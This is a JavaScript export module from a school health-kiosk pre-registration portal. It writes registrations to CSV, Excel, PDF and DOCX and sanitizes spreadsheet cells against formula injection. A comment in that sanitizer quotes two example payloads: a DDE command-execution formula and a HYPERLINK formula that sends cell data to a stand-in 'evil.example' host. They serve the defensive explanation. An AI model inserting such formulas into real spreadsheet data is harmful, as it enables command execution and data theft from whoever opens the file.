/**
 * Column mapping to the SMCBI Health Kiosk's `users` table (see
 * database/migrations in that project - firstname, lastname, email, role,
 * department, grade_level, strand, year_level, program, birthday, gender,
 * barcode). barcode comes from what the person typed in at registration -
 * the same number already printed on their physical school ID - rather
 * than being generated by this export. The kiosk's own registration flow
 * sets student_id equal to barcode for students (AuthController::register),
 * so a separate Student ID column here would just be a duplicate.
 *
 * Never a password/password_hash column of any kind, and never will be -
 * this table holds a PRE-registration, not a login account. The Health
 * Kiosk creates the actual account, and generates its own initial password
 * internally at import time, the same way it already does when an admin
 * adds a user there directly (see AddUserModal.jsx in that project:
 * firstname + "12345"). That generation must happen in the kiosk's own
 * bulk-import code when it's built, never here and never by putting the
 * password in this file.
 */

const COLLEGE_PROGRAMS = new Set(['BSIT', 'BSED', 'BEED', 'BSHM', 'BSBA'])

/** This portal only collects two roles; the kiosk's own enum is finer. */
function kioskRole(registration) {
  if (registration.department === 'COLLEGE INSTRUCTOR' || registration.department === 'BED INSTRUCTOR') {
    return 'teacher'
  }
  if (registration.department === 'NTP') return 'personnel'
  return 'student'
}

// Exact column set/order the Health Kiosk bulk importer expects - lowercase,
// matching its own database column names, so a future importer can parse
// this file by header name without a translation step.
export const EXPORT_COLUMNS = [
  'barcode',
  'role',
  'firstname',
  'lastname',
  'email',
  'birthday',
  'gender',
  'department',
  'grade_level',
  'strand',
  'year_level',
  'program',
]

export function toExportRows(registrations) {
  return registrations.map((row) => ({
    barcode: row.barcode ?? '',
    role: kioskRole(row),
    firstname: row.firstname,
    lastname: row.lastname,
    email: row.email,
    birthday: row.birthday,
    gender: row.gender,
    department: row.department,
    grade_level: row.grade_level ?? '',
    strand: row.strand ?? '',
    year_level: row.year_level ?? '',
    program: COLLEGE_PROGRAMS.has(row.program) ? row.program : '',
  }))
}

/**
 * Neutralizes CSV/formula injection.
 *
 * Every field here (name, email, School ID) is attacker-controlled - it
 * comes straight from the public registration form. A first name of
 * `=cmd|'/c calc'!A1` or `=HYPERLINK("https://evil.example/steal?"&A1)`
 * sits inert in the database, but Excel/Sheets treats it as a live formula
 * the instant an admin opens the exported CSV/XLSX - which can exfiltrate
 * other cells in the sheet or worse. Prefixing a leading '=', '+', '-', '@',
 * tab, or CR with a single quote forces spreadsheet apps to treat the cell
 * as plain text instead (the standard OWASP mitigation for this exact class
 * of bug). Only applied to CSV/Excel - DOCX can't execute formulas, so
 * prefixing there would just be visual noise on people's names for no
 * security benefit.
 */
function sanitizeForSpreadsheet(value) {
  const text = String(value ?? '')
  return /^[=+\-@\t\r]/.test(text) ? `'${text}` : text
}

function sanitizeRowForSpreadsheet(row) {
  const safe = {}
  for (const [key, value] of Object.entries(row)) {
    safe[key] = sanitizeForSpreadsheet(value)
  }
  return safe
}

export function downloadBlob(blob, filename) {
  const url = URL.createObjectURL(blob)
  const link = document.createElement('a')
  link.href = url
  link.download = filename
  document.body.appendChild(link)
  link.click()
  link.remove()
  URL.revokeObjectURL(url)
}

/** 'grade_level' -> 'Grade Level'. Human-readable labels for the PDF report only - the Excel file keeps the raw column names the kiosk importer parses by. */
function columnLabel(column) {
  return column
    .split('_')
    .map((word) => word.charAt(0).toUpperCase() + word.slice(1))
    .join(' ')
}

function csvEscape(value) {
  const text = String(value ?? '')
  if (/[",\n]/.test(text)) return `"${text.replace(/"/g, '""')}"`
  return text
}

export function exportCSV(registrations, filename = 'smcbi-approved-registrations.csv') {
  const rows = toExportRows(registrations).map(sanitizeRowForSpreadsheet)
  const lines = [
    EXPORT_COLUMNS.join(','),
    ...rows.map((row) => EXPORT_COLUMNS.map((column) => csvEscape(row[column])).join(',')),
  ]
  // BOM so Excel opens it as UTF-8 instead of guessing the system codepage.
  downloadBlob(new Blob(['﻿' + lines.join('\r\n')], { type: 'text/csv;charset=utf-8;' }), filename)
}

const COLUMN_WIDTHS = {
  email: 28,
  firstname: 18,
  lastname: 18,
  department: 20,
  barcode: 14,
  birthday: 14,
}

/**
 * Builds the exact Excel file the admin downloads, as a Blob - never
 * triggers a download itself. Kept separate from the download action so the
 * preview modal and the "Download Excel" button inside it work off the same
 * generated file: the preview never has to guess what the download will
 * look like.
 */
export async function buildExcelBlob(rows) {
  const ExcelJS = (await import('exceljs')).default

  const workbook = new ExcelJS.Workbook()
  workbook.creator = 'SMCBI Student Pre-Registration Portal'
  workbook.created = new Date()

  const sheet = workbook.addWorksheet('Registrations')
  sheet.columns = EXPORT_COLUMNS.map((column) => ({
    header: column,
    key: column,
    width: COLUMN_WIDTHS[column] ?? 16,
  }))
  // Freezes the header row so it stays visible while scrolling a long list.
  sheet.views = [{ state: 'frozen', ySplit: 1 }]
  sheet.getRow(1).font = { bold: true, color: { argb: 'FF1E3A8A' } }
  sheet.getRow(1).fill = { type: 'pattern', pattern: 'solid', fgColor: { argb: 'FFE5EDFF' } }
  sheet.getRow(1).alignment = { vertical: 'middle' }
  sheet.getColumn('birthday').numFmt = 'yyyy-mm-dd'

  rows.forEach((row) => {
    const safe = sanitizeRowForSpreadsheet(row)
    sheet.addRow({ ...safe, birthday: row.birthday ? new Date(`${row.birthday}T00:00:00`) : '' })
  })

  sheet.autoFilter = { from: 'A1', to: `${String.fromCharCode(64 + EXPORT_COLUMNS.length)}1` }

  const buffer = await workbook.xlsx.writeBuffer()
  return new Blob([buffer], { type: 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet' })
}

/**
 * Builds the exact PDF report the admin downloads, as a Blob - same
 * reasoning as buildExcelBlob above. Landscape A4 with a repeating header,
 * a bordered table (jspdf-autotable handles page breaks on its own), and a
 * "Page X of Y" footer added in a second pass once the total is known.
 */
export async function buildPdfBlob(rows) {
  const { jsPDF } = await import('jspdf')
  const autoTable = (await import('jspdf-autotable')).default

  const doc = new jsPDF({ orientation: 'landscape', unit: 'pt', format: 'a4' })
  const pageWidth = doc.internal.pageSize.getWidth()
  const pageHeight = doc.internal.pageSize.getHeight()
  const margin = 36
  const generatedAt = new Date().toLocaleString('en-US', { dateStyle: 'medium', timeStyle: 'short' })

  function drawHeader() {
    doc.setFont('helvetica', 'bold')
    doc.setFontSize(16)
    doc.setTextColor(30, 41, 59)
    doc.text('SMCBI Student Pre-Registration Report', margin, 32)
    doc.setFont('helvetica', 'normal')
    doc.setFontSize(9)
    doc.setTextColor(100, 116, 139)
    doc.text(`Generated ${generatedAt} - ${rows.length.toLocaleString()} record(s)`, margin, 47)
    doc.setDrawColor(226, 232, 240)
    doc.setLineWidth(0.75)
    doc.line(margin, 56, pageWidth - margin, 56)
  }

  drawHeader()

  autoTable(doc, {
    startY: 68,
    margin: { left: margin, right: margin, bottom: 44, top: 40 },
    head: [EXPORT_COLUMNS.map(columnLabel)],
    body: rows.map((row) => EXPORT_COLUMNS.map((column) => row[column] || '-')),
    styles: {
      fontSize: 8,
      cellPadding: 6,
      valign: 'middle',
      lineColor: [226, 232, 240],
      lineWidth: 0.5,
      textColor: [30, 41, 59],
    },
    headStyles: { fillColor: [37, 99, 235], textColor: 255, fontStyle: 'bold', fontSize: 8.5 },
    alternateRowStyles: { fillColor: [248, 250, 252] },
    columnStyles: {
      4: { cellWidth: 130 }, // email
      7: { cellWidth: 95 }, // department
    },
    didDrawPage: (data) => {
      if (data.pageNumber > 1) drawHeader()
    },
  })

  const pageCount = doc.internal.getNumberOfPages()
  for (let i = 1; i <= pageCount; i += 1) {
    doc.setPage(i)
    doc.setFont('helvetica', 'normal')
    doc.setFontSize(8)
    doc.setTextColor(148, 163, 184)
    doc.text('SMCBI Health Kiosk - Student Pre-Registration Portal', margin, pageHeight - 18)
    doc.text(`Page ${i} of ${pageCount}`, pageWidth - margin, pageHeight - 18, { align: 'right' })
  }

  return doc.output('blob')
}

export async function exportDocx(registrations, filename = 'smcbi-approved-registrations.docx') {
  const { Document, Packer, Paragraph, Table, TableRow, TableCell, TextRun, HeadingLevel, WidthType } =
    await import('docx')
  const rows = toExportRows(registrations)

  const headerRow = new TableRow({
    tableHeader: true,
    children: EXPORT_COLUMNS.map(
      (column) =>
        new TableCell({
          width: { size: 100 / EXPORT_COLUMNS.length, type: WidthType.PERCENTAGE },
          children: [new Paragraph({ children: [new TextRun({ text: column, bold: true })] })],
        }),
    ),
  })

  const bodyRows = rows.map(
    (row) =>
      new TableRow({
        children: EXPORT_COLUMNS.map(
          (column) =>
            new TableCell({
              children: [new Paragraph(String(row[column] ?? ''))],
            }),
        ),
      }),
  )

  const doc = new Document({
    sections: [
      {
        children: [
          new Paragraph({ text: 'SMCBI - Approved Student Registrations', heading: HeadingLevel.HEADING_2 }),
          new Paragraph({
            text: `Generated ${new Date().toLocaleString('en-US')} - ${rows.length} record(s)`,
          }),
          new Paragraph({ text: '' }),
          new Table({ width: { size: 100, type: WidthType.PERCENTAGE }, rows: [headerRow, ...bodyRows] }),
        ],
      },
    ],
  })

  const blob = await Packer.toBlob(doc)
  downloadBlob(blob, filename)
}
